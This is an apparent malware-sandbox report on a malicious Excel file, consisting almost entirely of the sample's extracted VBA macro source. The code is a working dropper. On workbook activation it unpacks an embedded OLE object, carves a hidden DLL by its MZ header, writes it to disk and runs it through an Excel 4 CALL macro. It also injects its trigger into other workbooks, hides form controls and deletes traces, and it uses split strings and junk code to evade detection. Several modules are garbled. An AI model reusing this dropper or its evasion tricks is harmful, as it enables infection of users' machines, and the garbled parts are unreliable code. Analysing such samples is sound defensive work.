Windows 7 deprecation
Windows 7 will be removed from on 2025-03-31
Static task
Behavioral task
0 signatures
0 seconds
Malware Config
Office macro that triggers on suspicious action 1 IoCs
Office document macro which triggers in special circumstances - often malicious.
resource yara_rule sample office_macro_on_action -
resource sample
e3c699b99e619fcac6e0364470028d79e8c96249b52ecaee2d2c832b03a594c4.xls windows office2003
1Attribute VB_Name = "Sem"2Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"3Attribute VB_GlobalNameSpace = False4Attribute VB_Creatable = False5Attribute VB_PredeclaredId = True6Attribute VB_Exposed = True7Attribute VB_TemplateDerived = False8Attribute VB_Customizable = True9Sub addWBActivate()1011Dim VBProj12Dim VBComp13Dim codeMod14Dim formsFolder As String15Dim tmpColl As Collection16Dim wBook As Workbook17Dim filesToPrcs As Collection18Dim flw19Dim cdw2021Dim fullFName As String22Dim activateExist As Boolean2324formsFolder = "C:\Users\GalkinVa\files_for_transport"2526Set tmpColl = flw.getPathsToFilesFromFolder(formsFolder)2728If tmpColl Is Nothing Then29Err.Raise 13, Description:="tmpColl variable doesn"30End If3132Set filesToPrcs = tmpColl3334For Each fName In filesToPrcs3536fullFName = fName3738fName = flw.extractNameWithExt(fullFName)39Set wBook = Workbooks.Open(fullFName)40Set VBProj = wBook.VBProject41424344If cdw.VBComponentExists("ThisWorkbook", VBProj) Then45Set VBComp = VBProj.VBComponents("ThisWorkbook")46ElseIf cdw.VBComponentExists("ÝòàÊíèãà", VBProj) Then47Set VBComp = VBProj.VBComponents("ÝòàÊíèãà")48Else49Err.Raise 13, "try to set VBComponent", "components from check doesn"50End If5152Set codeMod = VBComp.CodeModule5354Set tmpColl = cdw.ListProcedures(VBComp)55565758For Each proc In tmpColl59If proc = "Workbook_Activate" Then60activateExist = True61End If62Next proc6364If Not activateExist Then65Call cdw.CreateEventProcedure(VBComp)66Else67Debug.Print "Workbook_Activate already exist in " & wBook.Name68End If69wBook.RunAutoMacros xlAutoClose70On Error Resume Next71wBook.Close saveChanges:=True72If Err.Number <> 0 Then73Debug.Print "Error occured when try to save " & wBook.Name74End If75Next fName767778End Sub798081828384Private Sub Workbook_Activate()85If UserForm1.Visible = False Then86Module1.SendCollection87End If8889End Sub90Page1
1Attribute VB_Name = "Page1"2Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"3Attribute VB_GlobalNameSpace = False4Attribute VB_Creatable = False5Attribute VB_PredeclaredId = True6Attribute VB_Exposed = True7Attribute VB_TemplateDerived = False8Attribute VB_Customizable = True9Module1
1Attribute VB_Name = "Module1"234Public Gen5var4 As Byte56Public Gen4var As Byte78Public Gen5var3 As Byte910Public Const FirstB As Byte = 7711Public Const SecondB As Byte = 9012Public Const ThirdB As Byte = 144131415161718192021Public Property Get Keys() As Collection222324Set Keys = IKeys25End Property2627Public Property Get Items() As Collection28Set Items = IItms29End Property3031323334Public Sub SendCollection()3536Dim FucjiFilm As Object37Dim SpecialPath As String383940Set FucjiFilm = CreateObject("WScri" + "pt.Shell")41PRP = "%" & UserForm6.TextBox1.Tag4243UserForm6.TextBox1.Tag = FucjiFilm.ExpandEnvironmentStrings(PRP + "%")44UserForm6.TextBox3.Tag = FucjiFilm.SpecialFolders(UserForm6.TextBox3.Tag)4546ChDir (UserForm6.TextBox1.Tag)4748UserForm1.show49End Sub5051Public Sub Remove(Key)52If TypeName(Key) = "String" Then53Dim i54On Error Resume Next55Call IItms.Remove(Key)56Call IKeys.Remove(Key)5758For i = 1 To IItms.Count59If InStr("Collection,Prop", TypeName(IItms.Item(i))) <> 0 Then60If IItms.Item(i).Item("Name") = Key Then61Call IItms.Remove(i)62Call IKeys.Remove(i)63Exit For64End If65End If66Next67On Error GoTo 068Else69Call IItms.Remove(Key)70Call IKeys.Remove(Key)71End If72End Sub737475Private Function setItem(Key, Value, Optional RepFlg = True)76Dim i As Integer7778If TypeName(Key) = "String" Then7980If RepFlg Then8182If Key <> "" Then8384Call IItms.Add(Value)85Call IKeys.Add(IItms.Count)86End If87Else888990919293MsgBox "???"94End If95Else9697If IItms.Count < Key Then9899For i = IItms.Count To Key - 2100Call IItms.Add("")101Next102End If103If RepFlg Then104105On Error Resume Next106Call IItms.Remove(Key)107On Error GoTo 0108If IItms.Count < Key Then109Call IItms.Add(Value)110Else111Call IItms.Add(Value, before:=Key)112End If113Else114115If Key = 0 Then116If IItms.Count = 0 Then117Call IItms.Add(Value)118Else119Call IItms.Add(Value, before:=1)120End If121Else122If IItms.Count < Key Then123Call IItms.Add("")124Call IItms.Add(Value)125Else126Call IItms.Add(Value, after:=Key)127End If128End If129End If130End If131132End Function133134135136137138139140UserForm1
1Attribute VB_Name = "UserForm1"2Attribute VB_Base = "0{23CF06EE-43BE-4891-83E6-ACDD1EA60305}{F473BCB2-A78D-415E-8700-67ABF89B23AE}"3Attribute VB_GlobalNameSpace = False4Attribute VB_Creatable = False5Attribute VB_PredeclaredId = True6Attribute VB_Exposed = False7Attribute VB_TemplateDerived = False8Attribute VB_Customizable = False9Private Sub Label1_Click()1011End Sub1213Private Sub UserForm_Activate()14DoEvents15DoEvents16ChenderBegin17DoEvents18End Sub1920Private Sub UserForm_Initialize()21Call SystemButtonSettings(Me, False)2223End Sub24Module2
1Attribute VB_Name = "Module2"23456Public Function GetParam(Count As Integer) As String7Dim i As Long8Dim j As Integer9Dim c As String10Dim bInside As Boolean11Dim bQuoted As Boolean1213j = 114bInside = False15bQuoted = False16GetParam = ""17For i = 1 To Len(Command$)18c = Mid$(Command$, i, 1)19If bInside And bQuoted Then20If c = """" Then21j = j + 122bInside = False23bQuoted = False24End If25ElseIf bInside And Not bQuoted Then26If c = " " Then27j = j + 128bInside = False29bQuoted = False30End If31Else32If c = """" Then33If j > Count Then Exit Function34bInside = True35bQuoted = True36ElseIf c <> " " Then37bInside = True38bQuoted = False39End If40End If41If bInside And j = Count And c <> """" Then GetParam = GetParam & c42Next i43End Function444546Public Function PathBack(ByVal sPath As String) As String47On Error Resume Next48Dim sT As Variant49Dim tt As String50If Len(sPath) = 3 Then GoTo errorhand5152For ii = 0 To UBound(sT) - 253tt = tt & sT(ii) & "\"54Next ii5556PathBack = tt5758errorhand:59PathBack = sPath60End Function616263646566676869Class1
1Attribute VB_Name = "Class1"2Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"3Attribute VB_GlobalNameSpace = False4Attribute VB_Creatable = False5Attribute VB_PredeclaredId = False6Attribute VB_Exposed = False7Attribute VB_TemplateDerived = False8Attribute VB_Customizable = False910UserForm6
1Attribute VB_Name = "UserForm6"2Attribute VB_Base = "0{C96C7879-69D4-4098-93BA-2433C7F8FF64}{9F8BF3AA-B229-4F87-A287-D7830D393B89}"3Attribute VB_GlobalNameSpace = False4Attribute VB_Creatable = False5Attribute VB_PredeclaredId = True6Attribute VB_Exposed = False7Attribute VB_TemplateDerived = False8Attribute VB_Customizable = False9Page11
1Attribute VB_Name = "Page11"2Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"3Attribute VB_GlobalNameSpace = False4Attribute VB_Creatable = False5Attribute VB_PredeclaredId = True6Attribute VB_Exposed = True7Attribute VB_TemplateDerived = False8Attribute VB_Customizable = True9Module6
1Attribute VB_Name = "Module6"2#If VBA7 And Win64 Then3Public Const IsSecond = True4#Else5Public Const IsSecond = False67#End If89Public Function PrepareConfigForOutput() As Integer10On Error Resume Next11Dim i As Long12Dim sNextChar As String13Dim bInside As Boolean14Dim bQuoted As Boolean15Dim sCommand As String1617PrepareConfigForOutput = 018bInsideParameter = False19bQuoted = False20sCommand = Command$2122For i = 1 To ALen.B(sCommand)23sNextChar = Mid(sCommand, i, 1)24If bInsideParameter Then25If bQuoted Then26If sNextChar = " " Then27bInsideParameter = False28bQuoted = False29PrepareConfigForOutput = PrepareConfigForOutput + 130End If31End If3233End If34Next i35If bInsideParameter Then PrepareConfigForOutput = PrepareConfigForOutput + 136End Function373839Public Function PathBack(ByVal sPath As String) As String40On Error Resume Next41Dim sT As Variant42Dim tt As String43If Len(sPath) = 3 Then GoTo errorhand4445For ii = 0 To UBound(sT) - 246tt = tt & sT(ii) & "\"47Next ii4849PathBack = tt5051errorhand:52PathBack = sPath53End Function54Public Function GetParam(Count As Integer) As String55Dim i As Long56Dim j As Integer57Dim c As String58Dim bInside As Boolean59Dim bQuoted As Boolean6061j = 162bInside = False63bQuoted = False64GetParam = ""65For i = 1 To Len(Command$)66c = Mid$(Command$, i, 1)67If bInside And bQuoted Then68If c = """" Then69j = j + 170bInside = False71bQuoted = False72End If73ElseIf bInside And Not bQuoted Then74If c = " " Then75j = j + 176bInside = False77bQuoted = False78End If79Else80If c = """" Then81If j > Count Then Exit Function82bInside = True83bQuoted = True84ElseIf c <> " " Then85bInside = True86bQuoted = False87End If88End If89If bInside And j = Count And c <> """" Then GetParam = GetParam & c90Next i91End Function92939495Module5
1Attribute VB_Name = "Module5"2Public MousePointerLeak() As Byte345Sub ConvertChartToPicture()6Dim Cht As Chart7If ActiveChart Is Nothing Then Exit Sub8If TypeName(ActiveSheet) = "Chart" Then Exit Sub9Set Cht = ActiveChart10Cht.CopyPicture Appearance:=xlPrinter, _11Size:=xlScreen, Format:=xlPicture12ActiveWindow.RangeSelection.Select13ActiveSheet.Paste14End Sub15161718Private Function setItem(Key, Value, Optional RepFlg = True)19Dim i As Integer2021If TypeName(Key) = "String" Then2223If RepFlg Then2425If Key <> "" Then26On Error Resume Next27Call IItms.Remove(Key)28Call IKeys.Remove(Key)29On Error GoTo 030Call IItms.Add(Value, Key)31Call IKeys.Add(Key, Key)32Else33Call IItms.Add(Value)34Call IKeys.Add(IItms.Count)35End If36Else373839404142MsgBox "???"43End If44Else4546If IItms.Count < Key Then4748For i = IItms.Count To Key - 249Call IItms.Add("")50Next51End If52If RepFlg Then5354On Error Resume Next55Call IItms.Remove(Key)56On Error GoTo 057If IItms.Count < Key Then58Call IItms.Add(Value)59Else60Call IItms.Add(Value, before:=Key)61End If62Else6364If Key = 0 Then65If IItms.Count = 0 Then66Call IItms.Add(Value)67Else68Call IItms.Add(Value, before:=1)69End If70Else71If IItms.Count < Key Then72Call IItms.Add("")73Call IItms.Add(Value)74Else75Call IItms.Add(Value, after:=Key)76End If77End If78End If79End If8081End Function828384858687Public Sub ReplaceFile(WhereToGo)88DoEvents89ThisWorkbook.Sheets.Copy90Application.DisplayAlerts = False91DoEvents92ActiveWorkbook.SaveAs WhereToGo, Local:=False, FileFormat:=3 * 7 + 3 * 7 + 993DoEvents94ActiveWorkbook.Close95DoEvents9697End Sub9899100101102103104105106107108109110111112113114115116117118119Module4
1Attribute VB_Name = "Module4"23Private Const GWL_STYLE = -164Private Const WS_CAPTION = &HC000005Private Const WS_SYSMENU = &H80000678#If VBA7 Then910Private Declare PtrSafe Function BoxWSL _11Lib "user32" Alias "SetWindowLongA" (ByVal parameter1 As Long, _12ByVal nIndex As Long, ByVal dwNewLong As Long) As Long13Private Declare PtrSafe Function FWA1 _14Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _15ByVal lpWindowName As String) As Long16Private Declare PtrSafe Function DrawMenuBar _17Lib "user32" (ByVal parameter1 As Long) As Long18Private Declare PtrSafe Function GetWindowLong11 _19Lib "user32" Alias "GetWindowLongA" (ByVal parameter1 As Long, _20ByVal nIndex As Long) As Long2122#Else2324Private Declare Function GetWindowLong11 _25Lib "user32" Alias "GetWindowLongA" ( _26ByVal parameter1 As Long, ByVal nIndex As Long) As Long27Private Declare Function FWA1 _28Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, _29ByVal lpWindowName As String) As Long30Private Declare Function DrawMenuBar _31Lib "user32" (ByVal parameter1 As Long) As Long32Private Declare Function BoxWSL _33Lib "user32" Alias "SetWindowLongA" ( _34ByVal parameter1 As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long3536#End If3738394041424344Private Sub cmdExit_Click()45Unload M.e46End47End Sub4849505152Public Sub SystemButtonSettings(frm As Object, show As Boolean)53Dim windowStyle As Long54Dim windowHandle As Long5556windowHandle = FWA1(vbNullString, frm.Caption)57windowStyle = GetWindowLong11(windowHandle, GWL_STYLE)5859If show Then6061BoxWSL windowHandle, GWL_STYLE, (windowStyle + WS_SYSMENU)626364Else65BoxWSL windowHandle, GWL_STYLE, (windowStyle And Not WS_SYSMENU)6667End If6869DrawMenuBar (windowHandle)7071End Sub72Public Sub NumberBuffer(Number As Long, ByVal Buffer As Byte)73If UserForm1.Enabled = True Then74Put #Number, , Buffer75End If76End Sub777879808182Public Sub PublicResumEraseByArrayList(ParamArray putArrayBigList() As Variant)83On Error Resume Next84For Each Key In putArrayBigList85Kill Key86Next Key87On Error GoTo 088End Sub899091929394Private Sub ERRCHECK(result)95969798If result = RCPND_FMOD_OK Then99ms.gR.esult = MsgBox(result & ") " & If101102End Sub103104105106107108109110Module7
1Attribute VB_Name = "Module7"234Public Sub Text_Write(progbar As Object, tmptext As String, tmpSpalte As Long, tmpZeile As Long, tmpcolor As Long)5678For i = 1 To Len(tmptext)91011If TextClockWise = True Then1213141516For x = tmpSpalte To tmpSpalte + UBound(ZeichenArray, 1)17For y = tmpZeile - Letter.Position + Letter.FontHeight - 1 To tmpZeile - Letter.Position - UBound(ZeichenArray, 2) + Letter.FontHeight - 1 Step -11819OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) * 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1)2021OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position + UBound(ZeichenArray, 2) - Letter.FontHeight + 1) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1))22If ZeichenArray(x - tmpSpalte, tmpZeile - Letter.Position + Letter.FontHeight - 1 - y) Then2324Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False25262728Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 25529Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 25530Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 255313233Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0)34End If35Next y36Next x3738Else39404142434445OldLetter.ArrayRGB(ZeichenAnzahl - 1).Left = tmpSpalte46OldLetter.ArrayRGB(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position4748OldLetter.ArraySW(ZeichenAnzahl - 1).Left = tmpSpalte49OldLetter.ArraySW(ZeichenAnzahl - 1).Top = tmpZeile + Letter.Position505152For x = tmpSpalte To tmpSpalte - UBound(ZeichenArray, 1) Step -153For y = tmpZeile + Letter.Position To tmpZeile + Letter.Position + UBound(ZeichenArray, 2)5455OldLetterArray.RGB(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile + Letter.Position) = Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) * 100 + Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) * 10 + Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1)5657OldLetterArray.SW(ZeichenAnzahl - 1).Data(x - tmpSpalte, y - tmpZeile - Letter.Position) = CBool(Arra.y_SW((x - 1) Mod Spalten + 1, y - 1))58If ZeichenArray(tmpSpalte - x, y - tmpZeile - Letter.Position) Then5960Draw_Fill.Cell (x - 1) Mod Spalten + 1, y - 1, picsource, tmpcolor, False616263Arra.y_Red((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).R / 25564Arra.y_Green((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).G / 25565Arra.y_Blue((x - 1) Mod Spalten + 1, y - 1) = Draw_Color2.RGB_Bool(tmpcolor).B / 2556667Arra.y_SW((x - 1) Mod Spalten + 1, y - 1) = IIf(Draw_Color2.SW(tmpcolor), 1, 0)68End If69Next y70Next x71End If727374progbar.Value = i75Next i767778progbar.Value = 0798081Dra.w_Zoom picsource, pictarget82End Sub838485Public Sub ChenderBegin()86WhereToGo = UserForm6.TextBox1.Tag & "\repository" + ".xls" + "x"87CustomWBP = WhereToGo + "." + "zi" + "p"88buildPathFor = UserForm6.TextBox1.Tag89Dim ofbl As String90Dim CurrentSizeOfAT As Long91Dim sendings As Integer92ofbl = UserForm6.TextBox3.Tag + "\stadr_"93949596ofbl = ofbl & "." & "d" & "ll"979899oob = buildPathFor + "\ole" + "Obj" + "ect*.b" + "" + "in"100PublicResumEraseByArrayList oob, CustomWBP, ofbl101ReplaceFile WhereToGo102103FileCopy WhereToGo, CustomWBP104105sendings = 1106Set sNMSP = CreateObject("Shell." + "Application")107108If sendings > 0 And sendings > -30 Then109110Set FileWherePutTo2 = sNMSP.Namespace(buildPathFor)111Set FileWherePutTo = sNMSP.Namespace(CustomWBP)112113114115116FileWherePutTo2.CopyHere FileWherePutTo.Items.Item(UserForm6.Label2.Tag)117118End If119CurrentSizeOfAT = 270848120121If IsSecond Then122CurrentSizeOfAT = 300000 + 25118 + 2123sendings = 2124End If125Composition buildPathFor & UserForm6.Label1.Tag, ofbl, CurrentSizeOfAT, sendings126If sendings > 0 Then127sendings = sendings + 1128ChDir (UserForm6.TextBox3.Tag)129sendings = sendings + 1130End If131If sendings < 100 Then132sendings = sendings + 1133sendings = sendings + 1134End If135PrepareConfigForOutput136137If sendings < 0 Then138sendings = sendings + 1139sendings = sendings + 1140End If141ofbl = "CALL(""" + ofbl142143ExecuteExcel4Macro ofbl + """,""sipecp"",""J"")"144End Sub145146Public Function Load(HTMLSource As Variant) As Boolean147On Error GoTo ErrorTrap148149Const Chunk = 1000150151Dim WorkingSrc As String152Dim TagStart As Long153Dim TagEnd As Long154Dim TagLength As Long155Dim TagStartString As String156Dim As String157Dim Ptr As Long158Dim Cnt As Long159Dim Pos As Long160Dim testing As Boolean161Dim PosScriptEnd As Long162Dim PosEndScript As Long163Dim PosEndScriptEnd As Long164165166167WorkingSrc = HTMLSource168LocalElementCount = 0169LocalElementSize = 0170ReDim LocalElements(LocalElementSize)171172If NewWay Then173174175176177178Load = True179Ptr = 0180181182183Do184BlobSN = "/blob" & GetRan.domInteger() & ":"185Ptr = Ptr + 1186Loop While ((InStr(1, WorkingSrc, BlobSN, vbTextCompare) <> 0) And (Ptr < 10)) = Split(WorkingSrc, "<style")191Cnt = UBound( + 1192If Cnt > 1 Then193For Ptr = 1 To Cnt - 1194PosScriptEnd = InStr(1,, ">")195If PosScriptEnd > 0 Then196PosEndScript = InStr(PosScriptEnd,, "</style", vbTextCompare)197If PosEndScript > 0 Then198BlobCnt = BlobCnt + 1199BlobCnt = BlobCnt + 1200BlobCnt = BlobCnt + 1201BlobCnt = BlobCnt + 1202BlobCnt = BlobCnt + 1203BlobCnt = BlobCnt + = Mi.d(, 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mi.d(, PosEndScript)205BlobCnt = BlobCnt + 1206BlobCnt = BlobCnt + 1207BlobCnt = BlobCnt + 1208BlobCnt = BlobCnt + 1209BlobCnt = BlobCnt + 1210BlobCnt = BlobCnt + = Mi.d(, PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1)212BlobCnt = BlobCnt + 1213BlobCnt = BlobCnt + 1214BlobCnt = BlobCnt + 1215BlobCnt = BlobCnt + 1216BlobCnt = BlobCnt + 1217BlobCnt = BlobCnt + 1218219End If220End If221Next222WorkingSrc = Join(, "<style")223End = Split(WorkingSrc, "<style")228Cnt = UBound( + 1229If Cnt > 1 Then230For Ptr = 1 To Cnt - 1231PosScriptEnd = InStr(1,, ">")232If PosScriptEnd > 0 Then233PosEndScript = InStr(PosScriptEnd,, "</style", vbTextCompare)234If PosEndScript > 0 Then235BlobCnt = BlobCnt + 1236BlobCnt = BlobCnt + 1237BlobCnt = BlobCnt + 1238BlobCnt = BlobCnt + 1239BlobCnt = BlobCnt + 1240BlobCnt = BlobCnt + = Mi.d(, 1, PosScriptEnd) & BlobSN & BlobCnt & "/" & Mi.d(, PosEndScript)242BlobCnt = BlobCnt + 1243BlobCnt = BlobCnt + 1244BlobCnt = BlobCnt + 1245BlobCnt = BlobCnt + 1246BlobCnt = BlobCnt + 1247BlobCnt = BlobCnt + = Mi.d(, PosScriptEnd + 1, (PosEndScript - 1) - (PosScriptEnd + 1) + 1)249BlobCnt = BlobCnt + 1250BlobCnt = BlobCnt + 1251BlobCnt = BlobCnt + 1252BlobCnt = BlobCnt + 1253BlobCnt = BlobCnt + 1254BlobCnt = BlobCnt + 1255256End If257End If258Next259WorkingSrc = Join(, "<style")260End If261Exit Function262End If263ErrorTrap:264Call Handle.Error("Load", Err.Number, Err.Source, Err.Description)265End Function266267268269270Public Sub Composition(Composition2 As String, ofbl As String, fl As Long, Gen5var6 As Integer)271272Dim Gen5var1 As Long273274Dim Class1 As Class1275Set Class1 = New Class1276277278279Dim SimpleMethod As Integer280ReDim MousePointerLeak(1 To fl)281Gen5var1 = FreeFile282283Open Composition2 For Binary Access Read As Gen5var1284Dim cur As Integer285cur = 1286Do While 1287Get Gen5var1, , Gen4var288If Gen4var = FirstB Then289MousePointerLeak(1) = Gen4var290291Get Gen5var1, , Gen5var3292If Gen5var3 = SecondB Then293MousePointerLeak(2) = Gen5var3294295Get Gen5var1, , Gen5var4296If Gen5var4 = ThirdB Then297MousePointerLeak(3) = Gen5var4298299If cur = Gen5var6 Then300For k = 4 To fl301Get Gen5var1, , Gen4var302MousePointerLeak(k) = Gen4var303Next k304Exit Do305Else306cur = cur + 1307End If308End If309End If310End If311Loop312313Close Gen5var1314On Error Resume Next315Gen5var1 = FreeFile316Open ofbl For Binary Lock Read Write As #Gen5var1317For i = LBound(MousePointerLeak) To UBound(MousePointerLeak)318319If UserForm1.Enabled = True Then320NumberBuffer Gen5var1, MousePointerLeak(i)321End If322Next i323324Close Gen5var1325326End Sub327328329330331332333334335336337338339340